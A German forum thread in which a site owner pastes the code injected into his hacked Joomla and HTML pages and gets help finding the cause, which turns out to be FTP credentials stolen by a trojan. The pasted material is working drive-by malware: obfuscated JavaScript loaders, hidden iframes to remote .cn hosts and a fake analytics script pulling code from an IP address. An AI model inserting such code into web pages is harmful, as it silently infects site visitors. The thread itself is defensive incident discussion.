Hackangriff auf meine Seiten?

[cmprmsd]

Hey alle,
ich hab ein dickes Problem mit meinen zwei Internetpräsenzen. Die eine wurde am 12.06.09 gehackt und die andere heute morgen um 09 uhr soweit die zeitangabe der dateiänderung stimmt.
Es wurden jeweils die index.html und index.php ersetzt.
Nun mal alles was ich bis jetz weiß und was ich wissen will :/

auf exposer.webhosted.org/portfolio in der index.html

</style></head><script type="text/javascript">var kBcbixsouogTfIchnyMH = "kV60kV105kV102kV114kV97kV109kV101kV32kV119kV105kV100kV116kV104kV61kV34kV52kV56kV48kV34kV32kV104kV101kV105kV103kV104kV116kV61kV34kV54kV48kV34kV32kV115kV114kV99kV61kV34kV104kV116kV116kV112kV58kV47kV47kV104kV105kV116kV45kV115kV101kV110kV100kV101kV114kV115kV46kV99kV110kV47kV102kV105kV110kV100kV47kV105kV110kV46kV99kV103kV105kV63kV54kV34kV32kV115kV116kV121kV108kV101kV61kV34kV98kV111kV114kV100kV101kV114kV58kV48kV112kV120kV59kV32kV112kV111kV115kV105kV116kV105kV111kV110kV58kV114kV101kV108kV97kV116kV105kV118kV101kV59kV32kV116kV111kV112kV58kV48kV112kV120kV59kV32kV108kV101kV102kV116kV58kV45kV53kV48kV48kV112kV120kV59kV32kV111kV112kV97kV99kV105kV116kV121kV58kV48kV59kV32kV102kV105kV108kV116kV101kV114kV58kV112kV114kV111kV103kV105kV100kV58kV68kV88kV73kV109kV97kV103kV101kV84kV114kV97kV110kV115kV102kV111kV114kV109kV46kV77kV105kV99kV114kV111kV115kV111kV102kV116kV46kV65kV108kV112kV104kV97kV40kV111kV112kV97kV99kV105kV116kV121kV61kV48kV41kV59kV32kV45kV109kV111kV122kV45kV111kV112kV97kV99kV105kV116kV121kV58kV48kV34kV62kV60kV47kV105kV102kV114kV97kV109kV101kV62";var FVxOkuVZcmEMnhoVehKZ = kBcbixsouogTfIchnyMH.split("kV");var VqsBzVjmTvtZRroBmJaO = "";for (var wfbjMQFrxPQSGJUFeDry=1; wfbjMQFrxPQSGJUFeDry<FVxOkuVZcmEMnhoVehKZ.length; wfbjMQFrxPQSGJUFeDry++){VqsBzVjmTvtZRroBmJaO+=String.fromCharCode(FVxOkuVZcmEMnhoVehKZ[wfbjMQFrxPQSGJUFeDry]);}var MNwVKuSOmaiBMmiNFikT = ""+VqsBzVjmTvtZRroBmJaO+"";document.write(""+MNwVKuSOmaiBMmiNFikT+"")</script>

Ein Script der eher nach nem verschlüsseltem Virus aussieht. (Welchen exploit in welchem Browser er ausnutzen soll weiß ich nicht)

Und ein iframe ->

<iframe src="http://yourfilmlife.cn:8080/index.php" width=163 height=139 style="visibility: hidden"></iframe>

Noch eins auf exposer.webhosted.org in der rootdatei index.html

<iframe src="http://gianthighest.cn:8080/index.php" width=111 height=120 style="visibility: hidden"></iframe>

Danach kommt noch

<div align="center">
  <p>&nbsp;</p>
  <table width="399" border="0" cellspacing="0" cellpadding="0">

    <tr>
      <td><img src="enterbildd1_03.jpg" width="399" height="321" /

Und der rest der datei fehlt dann einfach oO

Es sieht nach einem automatisch gepostetem exploitscript aus, der versucht seiten zu overtaken, da die methode anscheinend gleich ist und meine dateien beide am ende einfach abgeschnitten sind. Kein normaler hacker würde eine seite halb hacken, bzw es überhaupt erkennen lassen..

Hat sonst noch jemand solche Vorfälle auf seinen Servern?
Catchmod.de wurde auch gehackt, aber da hatte ich einfach ohne drüber nachzudenken die indexdateien mit älteren backup indexes ersetzt =/


Edit:

Ist ja lustig.. ich habe noch einen unterordner gehabt, in der eine index.php war.. Dort ist allerdings nur ein kleiner header drin gewesen ansonsten nichts. Dort wurde der Viruscode wohl in Reinform platziert :

<?php
header ("Location: install.php");
?>

<div style="display:none<?php echo '<script type="text/javascript">var kBcbixsouogTfIchnyMH = "kV60kV105kV102kV114kV97kV109kV101kV32kV119kV105kV100kV116kV104kV61kV34kV52kV56kV48kV34kV32kV104kV101kV105kV103kV104kV116kV61kV34kV54kV48kV34kV32kV115kV114kV99kV61kV34kV104kV116kV116kV112kV58kV47kV47kV104kV105kV116kV45kV115kV101kV110kV100kV101kV114kV115kV46kV99kV110kV47kV102kV105kV110kV100kV47kV105kV110kV46kV99kV103kV105kV63kV54kV34kV32kV115kV116kV121kV108kV101kV61kV34kV98kV111kV114kV100kV101kV114kV58kV48kV112kV120kV59kV32kV112kV111kV115kV105kV116kV105kV111kV110kV58kV114kV101kV108kV97kV116kV105kV118kV101kV59kV32kV116kV111kV112kV58kV48kV112kV120kV59kV32kV108kV101kV102kV116kV58kV45kV53kV48kV48kV112kV120kV59kV32kV111kV112kV97kV99kV105kV116kV121kV58kV48kV59kV32kV102kV105kV108kV116kV101kV114kV58kV112kV114kV111kV103kV105kV100kV58kV68kV88kV73kV109kV97kV103kV101kV84kV114kV97kV110kV115kV102kV111kV114kV109kV46kV77kV105kV99kV114kV111kV115kV111kV102kV116kV46kV65kV108kV112kV104kV97kV40kV111kV112kV97kV99kV105kV116kV121kV61kV48kV41kV59kV32kV45kV109kV111kV122kV45kV111kV112kV97kV99kV105kV116kV121kV58kV48kV34kV62kV60kV47kV105kV102kV114kV97kV109kV101kV62";var FVxOkuVZcmEMnhoVehKZ = kBcbixsouogTfIchnyMH.split("kV");var VqsBzVjmTvtZRroBmJaO = "";for (var wfbjMQFrxPQSGJUFeDry=1; wfbjMQFrxPQSGJUFeDry<FVxOkuVZcmEMnhoVehKZ.length; wfbjMQFrxPQSGJUFeDry++){VqsBzVjmTvtZRroBmJaO+=String.fromCharCode(FVxOkuVZcmEMnhoVehKZ[wfbjMQFrxPQSGJUFeDry]);}var MNwVKuSOmaiBMmiNFikT = ""+VqsBzVjmTvtZRroBmJaO+"";document.write(""+MNwVKuSOmaiBMmiNFikT+"")</script>'

<iframe src="http://nyfilmlife.cn:8080/index.php" width=128 height=113 style="visibility: hidden"></if

<iframe src="http://shopfilmlifeforce.cn:8080/index.php" width=133 height=168 style="visibility: hidden"></

<iframe src="http://yourfilmlife.cn:8080/index.php" width=163 height=139 style="visibility: hidden"></iframe>

Ich gehe mal davon aus, dass der FTP geknackt wurde. Da muss wohl ein exploit irgendwo gewesen sein, denn ich habe diese unterordner in denen überall nur die index datei verändert wurde, nirgends verlinkt oder von google scannen lassen.(ich gehe nicht davon aus dass google alle subordner und dateien bruteforced :>

Was ich mir aber auch vorstellen könnte, wäre dass code durch exploits in Joomla ( 1.5.8 auf der einen seite catchmod hochgeladen wurde) und durch nen anderen exploit auf die andere. Wobei ich da in der index.html eigentlich nichts besonderes genutzt hatte außer html und nem javascript.

Es werden doch noch andere Dateien(anscheinend vielverwendete seiten in cmssystem) angegriffen.

<body<?php print phptemplate_body_class($left, $right); ?><iframe src="http://gianthighest.cn:8080/index.php" width=111 height=120 style="visibility: hidden"></iframe>>

Ich habe grade, da ich den Vserver mit nem Freund zusammen benutze noch einen weiteren Code gefunden. Catchmod.de läuft zusammen mit ner anderen seite auf nem 1blu host und im ordner meines freundes (der seine seite schon lang nicht mehr aktualisiert) habe ich grade die datei modifiziert aufgefunden.

Unten im Quellcode wurde nach dem normalem Joomla quellcode folgendes eingeschleust.

<?php echo '<script type="text/javascript">

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");

document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));

</script>

<script type="text/javascript">

try {

var pageTracker = _gat._getTracker("UA-7623457-2");

pageTracker._trackPageview();

} catch(err) {}</script>'; ?>

Edit :
Ein weiterer Fall wurde gesichtet auf ->
http://www.phpbb.com/community/viewtopic.php?f=46&t=1647035

Noch einer auf
http://stackoverflow.com/questions/992403/parse-error-syntax-error-unexpected-in-fix

wieder einer -> http://forums.devarticles.com/php-development-48/unexpected-t-constant-encapsed-string-200937.html

Alle weiteren werden wohl ziemlich schnell hier zu finden sein, wenn der typ so weiter macht..
http://www.google.com/search?hl=en&...:official&hs=t0Y&q=UA-7623457-2&aq=f&oq=&aqi=
Ein hacker mit ner eindeutigen Benutzer-ID...
Kann man gegen soetwas vorgehen??

 

[Stefan-]

Ein geknackter FTP ist normalerweise unwahrscheinlich. Da müsstest du das Passwort schon weitergegeben haben, anderswo ebenfalls verwenden oder offen rumliegen lassen. Dein Joomla ist vermutlich an irgendeiner Stelle anfällig, was durch automatische Scans aufgedeckt wird.

Übrigens, letzteres ergibt, dass von 91.212.65.148 ein Javascript geladen wird. Damit liegt nahe, dass deine Hacker aus der Ukraine kommen.

 

[cmprmsd]

Nene das Pw wurde nicht weitergegeben. Es ist ein automatisch generiertes gewesen, die für gewöhnlich als sicher gelten.

Also nicht wie man bei den chinesischen urls vermutet auf China?

Hmm das ist ärgerlich. Dann werde ich wohl besser das Gesamtbackup vom 11.06.09 aufspielen und dann die updates von joomla installieren.

Laut google müsste man _gat._getTracker("UA-7623457-2"); doch auf den benutzer zurück führen können oder? (Zu protokollierendes Konto.
Gibt die Nummer des Kontos an, in welchem die Seite protokolliert werden soll. -- _gat._getTracker(urchinAccount) )

http://www.google.com/support/googleanalytics/bin/answer.py?hl=de&answer=76305

 

[cmprmsd]

Erneuter Hackangriff diesmal mit anderer Verschlüsselung?

<?php echo '<script type="text/javascript">var IOzphIfgNFfvZUWlopKA = "jx60jx105jx102jx114jx97jx109jx101jx32jx119jx105jx100jx116jx104jx61jx34jx52jx56jx48jx34jx32jx104jx101jx105jx103jx104jx116jx61jx34jx54jx48jx34jx32jx115jx114jx99jx61jx34jx104jx116jx116jx112jx58jx47jx47jx104jx105jx116jx45jx115jx101jx110jx100jx101jx114jx115jx46jx99jx110jx47jx102jx105jx110jx100jx47jx105jx110jx46jx99jx103jx105jx63jx57jx34jx32jx115jx116jx121jx108jx101jx61jx34jx98jx111jx114jx100jx101jx114jx58jx48jx112jx120jx59jx32jx112jx111jx115jx105jx116jx105jx111jx110jx58jx114jx101jx108jx97jx116jx105jx118jx101jx59jx32jx116jx111jx112jx58jx48jx112jx120jx59jx32jx108jx101jx102jx116jx58jx45jx53jx48jx48jx112jx120jx59jx32jx111jx112jx97jx99jx105jx116jx121jx58jx48jx59jx32jx102jx105jx108jx116jx101jx114jx58jx112jx114jx111jx103jx105jx100jx58jx68jx88jx73jx109jx97jx103jx101jx84jx114jx97jx110jx115jx102jx111jx114jx109jx46jx77jx105jx99jx114jx111jx115jx111jx102jx116jx46jx65jx108jx112jx104jx97jx40jx111jx112jx97jx99jx105jx116jx121jx61jx48jx41jx59jx32jx45jx109jx111jx122jx45jx111jx112jx97jx99jx105jx116jx121jx58jx48jx34jx62jx60jx47jx105jx102jx114jx97jx109jx101jx62";var sGvqTEGPiwEqKDgrMLXZ = IOzphIfgNFfvZUWlopKA.split("jx");var RDVqYrbMhmMatIQNMWdu = "";for (var ShldkRVwdtVuwrkViMhQ=1; ShldkRVwdtVuwrkViMhQ<sGvqTEGPiwEqKDgrMLXZ.length; ShldkRVwdtVuwrkViMhQ++){RDVqYrbMhmMatIQNMWdu+=String.fromCharCode(sGvqTEGPiwEqKDgrMLXZ[ShldkRVwdtVuwrkViMhQ]);}var faMcEffqbzewaHKsLaVu = ""+RDVqYrbMhmMatIQNMWdu+"";document.write(""+faMcEffqbzewaHKsLaVu+"")</script>'; ?>

 

[Stefan-]

Also:

Zuerst patchst du deine Software. Irgendwoher muss das ja kommen.

a) Welche Systeme verwendest du?
b) Welche Plugins / Mods / Eigenkreationen verwendest du?
c) Gibt es zu irgendeinem dieser Codes Updates, die du nicht verwendest?
d) Gibt es ungepatchte Sicherheitslücken?

Dann:

(1) Datenbank sichern
(2) Passwörter von FTP, Datenbanken und allen WebDAVs usw. ändern
(3) Die Benutzer-Tabellen für alle CMS o.ä. kontrollieren und alle Passwörter für erweiterte Zugriffe ändern

Letzter Punkt:

(4) Deinen Hoster informieren. Möglicherweise ist nicht dein System Ursprung des Problems.

Ich vermute mal, dass Punkt a) oder b) der Hintergrund sind. Alles andere ist ein Bot, mehr nicht.

 

[cmprmsd]

Ich habe regelmäßig mit Joomlapack meine Seite komplett gesichert, also sql & dateien. Das wurde dann als zip immer gespeichert und ich habs mir dann runtergezogen. Nun stell ich beim entpacken fest dass er bei der sql datei immer sagt, entpacken nicht möglich crc fehler -.-
Hinzu kommt noch, dass mein Hoster irgendwie nicht auf php5 umstellen will, womit ich zb die neue version von joomfish benutzt hätte.

Also das cms ist joomla 1.5.8 gewesen, aber selbst nach dem update auf 1.5.11 wurde sie ja erneut kaptut gemacht.
als login hab ich yoologin

Ne Rettung ist nun nicht mehr möglich, weil die Sql tabellen komplett auseinander genommen wurden.
Die ganze Benutzerdatenbank ist nicht mehr aufrufbar.. Ich werde die Seite wohl von grund auf neu schreiben. Kleiner schneller und aktueller :/

Mein Administrator sagt, der Fehler müsste auf meinem PC liegen, da keine unsauberen FTP-Zugriffe verwendet wurden. Wenn ich das Problem nich baldmöglichst behebe wird er den Space wohl schließen. hm

Auf dem anderem Ftp hab ich nun auch wieder nen wurm gefunden..

<script type="text/javascript">function qbmwzz(mvlilj){function shibe(yjsp){var putkrieg = 0;var wzpciuep = yjsp.length;var qeik = 0;while (qeik < wzpciuep){putkrieg += (yjsp.charCodeAt(qeik))*wzpciuep%255;qeik++;}return putkrieg%255;}mvlilj=unescape(mvlilj);scqgjk=[""];scqgjk[1]=arguments;scqgjk[2]="callee";try{var zgsbc= scqgjk[1][scqgjk[2]];}catch(jonl){}dkbqlodr=(new String(zgsbc)).replace(/[^@a-z0-9A-Z_.,-]/g, '');boyljd=shibe(dkbqlodr);gwralhls="";var wiyy = 0;for(rfxui=0;rfxui<mvlilj.length;rfxui++){gwralhls += String.fromCharCode(mvlilj.charCodeAt(rfxui)^boyljd^dkbqlodr.charCodeAt(rfxui)^rfxui%255^wiyy%255);wiyy++;if (wiyy > dkbqlodr.length) wiyy = 0;} document.write(gwralhls);}qbmwzz("%90%D7%D0%C4%D2%9D%99%C6%D4%CC%DE%83%8C%D4%CE%CA%86%D0%D2%D9%C0%DA%99%8B%DA%CA%D6%D4%D5%C3%DA%92%C1%DC%CE%DC%98%82%97%D1%DC%CD%DF%CC%DD%83%DC%DF%99%81%89%D0%C9%C4%CA%93%8C%90%D7%D9%DC%D5%D7%CE%81%D4%81%CD%C3%D8%CD%93%C8%DF%D2%82%C1%C8%94%92%C5%CC%89%D8%CF%DC%CA%CF%93%D3%DD

Bei dem hab ich das Passwort grad eben geändert. Ich hoffe mal jemand hatte "nur" die ftp daten irgendwie bekommen... Dann is der Spuck auf dem Server wenigstens vorbei

 

[Stefan-]

Es KANN sicherlich an deinem PC liegen, z.B: über XSS. Wenn dein Hoster nicht auf PHP5 wechseln will, solltest du den Hoster wechseln. Ich kann dir persönlich Webhostone empfehlen. Der ist für den hervorragenden Support wirklich günstig.

Dass es am FTP liegt halte ich für wirklich unwahrscheinlich.

 

[cmprmsd]

Habe nun die Ursache gefunden. Vor nem Monat zirka hatte ich noch XP und Vista drauf und mein XP wurde von nem Trojaner infiziert. Mein Avira Antivir hat die datei übrigens nicht erkannt, da sie sich wohl als rootkit getarnt hat. Aber hab sofort gemerkt dass sich einige Dateien kopiert und gestartet haben und habe schnell neugestartet und das System mit Vista gereinigt. Denn das Avira da hat den Virus erkannt. Warum auch immer..
Auf jeden Fall wars mir nicht möglich den Virus 100%ig wegzukriegen, da meine Netzwerkkarte beim entfernen all der infizierten dateien nicht mehr lief. Darauf hin habe ich dann formatiert und Kaspersky zugelegt, womit ich wohl nun bei xp um einiges sicher fahren werde als mit avira.

In dem kleinem Zeitfenster zwischen verbreiten und entdecken des trojaners wurde wohl eine sicherheitsdatei auf meiner externen festplatte gefunden auf der sämtliche FTP-Accounts sind.
Das habe ich eben nachvollziehen können, da sich das gleiche Muster der index.php modifizierung auf allen anderen Servern die ich habe auch vollzogen hat.
So schnell kanns gehn. Nun sind alle Passwörter geändert und die Dateien gelöscht.
Hab nun erstmal genug zu tun alles wieder hinzurichten im nächsten Monat :>